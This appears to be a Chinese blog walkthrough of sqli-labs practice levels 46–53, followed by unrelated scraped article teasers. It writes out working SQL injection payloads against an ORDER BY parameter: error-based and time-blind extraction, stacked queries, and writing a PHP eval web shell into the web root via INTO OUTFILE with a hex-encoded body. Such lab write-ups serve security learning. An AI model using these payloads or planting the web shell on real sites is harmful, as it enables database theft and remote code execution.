sqli-libs(46-53关)
Less_46
补充知识:MySQL知识
SQL语句中,asc是指定列按升序排列,desc则是指定列 按降序排列;
Select * from users order by 1 desc; 使用降序进行排列;
Select * from users order by 1 asc; 使用升序进行排列;
Right() select right(database(),1) 从右往左数第一个数据库;
Left() select left(database(),1) 从左往右数第一个数据库;
less46没有使用包裹
输入?id=1 得到下面,所以我们使用?sort=1 进行操作 其中1代表把第一列按从小到大进行排列;
修改为2,即为将第二列按从小到大进行排列;
?Sort=2 desc; 使用降序进行排列;
?Id=2 asc; 使用升序进行排列;
说明这里存在注入漏洞
三种方法:
1.报错注入
2.时间盲注
3.一句话木马
方法一:报错注入
输入:?sort=3 and updatexml( 1, concat( 0x7e, (database())), 1) --+ 得到当前数据库;
输入:?sort=3 and updatexml( 1, concat( 0x7e, (select schema_name from information_schema.schemata limit 0,1), 1) ,1)--+ 得到第一个数据库名字;
方法二: 时间盲注
输入:?sort=3 and if(length(database()=1),1,sleep(5))--+
输入:?sort=3 and if(left((select schema_name from information_schema.schemata limit 0,1),1)>'s',1,sleep(5))--+
方法三:一句话木马
输入 ?sort=3 and (select '<?php @eval($_POST[gxy]);?>') into outfile 'C:\\phpStudy\\WWW\\c.php '--+
我们并没有把一句话木马写进去,所以我们采取 lines terminated by 0x 十六进制进行注入;
输入 ?sort=3 into outfile "C:\\phpStudy\\WWW\\c.php" lines terminated by 0x3c3f70687020406576616c28245f504f53545b27677879275d293b203f3e --+
Less_47
Less47:使用’’包裹 其他与第46关基本一致
Less_48
Less48: 无包裹 不返回报错信息 不能使用报错注入,其他操作与第46关基本一致。
Less_49
Less49: 使用“”包裹 不返回报错信息 不能使用报错注入,其他操作与第46关基本一致
Less_50
Less50无包裹
第50关与第46关不同的是 使用了mysqli_multi_query函数
mysqli_multi_query() 函数执行一个或多个针对数据库的查询。多个查询用分号进行分隔。
所以我们可以用堆叠注入的方法;
五种方法:
1.时间的盲注
2.报错注入
3.写一句话木马
4.使用堆叠注入创建删除一个表
5.使用堆叠 注入写一句话木马
方法一:时间盲注
?sort=1 and if(length(database()>1),1,sleep(5)) --+
方法二:报错盲注
?sort=1 and updatexml(1,concat(0x7e,(database())),1)--+
方法三:写一句话木马
输入:?sort=1 and (select '<?php @eval($_POST[ztt]);?>') into outfile 'C:\\phpStudy\\WWW\\a.php '--+
发现一句话木马并没有,输入:?sort=1 into outfile "C:\\phpStudy\\WWW\\a.php" lines terminated by 0x3c3f70687020406576616c28245f504f53545b27677879275d293b203f3e --+
方法四:使用堆叠注入创建一个表
?sort=3;create table ztt50 like users;insert into ztt50 select * from users;--+
Less_51
Less-51: 使用’’包裹 其他操作与第50关基本一致。
五种方法:
1.时间的盲注
2.报错注入
3.写一句话木马
4.使用堆叠注入创建删除一个表
5.使用堆叠 注入写一句话木马
Less_52
Less-52: 无包裹 回显不显示错误 不能使用报错注入,则其他方法与第50关基本一致
四种方法:
1.时间的盲注
2.写一句话木马
3.使用堆叠注入创建删除一个表
4.使用堆叠 注入写一句话木马
Less_53
Less-53:使用’’包裹 不回显错误 不能使用报错注入 其他方法与第50关基本一致。
四种方法:
1.时间的盲注
2.写一句话木马
3.使用堆叠注入创建删除一个表
4.使用堆叠 注入写一句话木马
sqli-libs(46-53关)的更多相关文章
- SD card技术了解并WINCE下SDHC驱动开发(updated)
Suumary: 简单介绍了一下SD卡的历史和发展,同时结合MX31 ADS上的WINCE 下SDHC驱动更深入的了解该硬件的一些行为特点. 了解SD card SD是Secure Digital C ...
- SQL-三级分类查询
/*SQLyog 企业版 - MySQL GUI v8.14 MySQL - 5.5.40 : Database - appinfodb******************************** ...
- mysql表基本查询
第一节 -- or # 单行注释/***多行注释*/ -- c创建数据库examCREATE DATABASE exam; USE exam; /*创建部门表*/CREATE TABLE dept( ...
- MySQL内存计算器
MySQL如何使用内存? 首先,介绍MySQL使用内存的一些方法: 1. 会话级别的内存消耗(连接私有内存):如sort_buffer_size等,每个会话都会开辟一个sort_buffer_size ...
- bzoj AC倒序
Search GO 说明:输入题号直接进入相应题目,如需搜索含数字的题目,请在关键词前加单引号 Problem ID Title Source AC Submit Y 1000 A+B Problem ...
- Linux软件包管理和磁盘管理实践
一.自建yum仓库,分别为网络源和本地源 本地yum仓库的搭建就是以下三个步骤: 创建仓库目录结构 上传相应的包到目录下,或者直接挂载光盘也行,如果挂载光盘,第三步就可以省略,因为光盘默认里有repo ...
- Oracle精讲视频课程【价值1.67万】
ke程链接 https://edu.51cto.com/center/course/lesson/index?id=14443 课程大纲: 0_Oracle学习路线分析(Oracle学习必读)[免费试 ...
- 资源描述结构(Resource Description Framework,RDF)
资源描述框架(Resource Description Framework),一种用于描述Web资源的标记语言.RDF是一个处理元数据的XML(标准通用标记语言的子集)应用,所谓元数据,就是" ...
- 获取文本的编码类型(from logparse)
import java.io.BufferedReader; import java.io.File; import java.io.FileInputStream; import java.io.F ...
- [机器学习] 深度学习之caffe1——软件配置与测试
caffe的编译配置真的是很让人头疼啊,不知道试过多少次了~~~ 重装系统了七八次,搞得linux的一些常用命令倒是很熟悉了~~~ 我有洁癖~~~某一个点上出了错,我一定要把它搞好了,再重新来一次,我 ...
随机推荐
- Selenium chromeDriver启动时报错:session not created: This version of ChromeDriver only supports Chrome
解决方案: 这是因为ChromeDriver与本地chrome浏览器的版本不一致导致 ChromeDriver下载地址:http://npm.taobao.org/mirrors/chromedriv ...
- HTTPClient模拟Get和Post请求
一.模拟Get请求(无参) 首先导入HttpClient依赖 <dependency> <groupId>org.apache.httpcomponents</group ...
- day06_类与对象、封装、构造方法
02_面向对象与常用类 01_面向对象思想的概述 面向过程:当需要实现一个功能的时候,每个具体的步骤都需要亲力亲为,详细处理每一个细节. 面向对象:当需要实现一个功能的时候,不关心具体步骤,而是找一个 ...
- 一起学Vue之列表渲染
在Vue开发中,列表数据绑定非常简单易用,本文主要通过一些简单的小例子,讲述v-for的使用方法,仅供学习分享使用,如有不足之处,还请指正. 用 v-for 把一个数组对应为一组元素 我们可以用 v- ...
- ASP.NET MVC入门到精通——MVC请求管道
https://www.cnblogs.com/jiekzou/p/4896315.html 本系列目录:ASP.NET MVC4入门到精通系列目录汇总 ASP.NET MVC的请求管道和ASP.NE ...
- 转载:TDM协议
转自http://www.wangdali.net/i2s/ 1. PCM简介 PCM (Pulse Code Modulation) 是通过等时间隔(即采样率时钟周期)采样将模拟信号数字化的方法.图 ...
- EF CodeFirst 一对一、一对多、多对多关系
一对一关系 如图,无需专门指定,系统会默认在Person表中生成字段Pet_Id为Pet表的外键(一对一). Require:必要的(一对一) Optional:可选的(一对零) Principa ...
- EF CodeFirst简介、默认约定、数据库初始化策略
CodeFirst 工作流程 创建或修改领域类-->使用数据注解或者Fluent API来配置领域类-->使用自动数据库迁移技术或者基于代码的数据库迁移技术来创建数据库. CodeFirs ...
- TD - 单选框 - RadioButton
基本方法 Html - 默认选中 //checked="true" - 默认选中 <input dojoType="bootstrap.form.RadioButt ...
- 阿里云MySQL安装到centos,并链接。
Last login: Wed Jan 22 11:21:17 on ttys001 wulaguixiaomianyangdeMacBook-Pro:~ xingwen$ ssh root@47.9 ...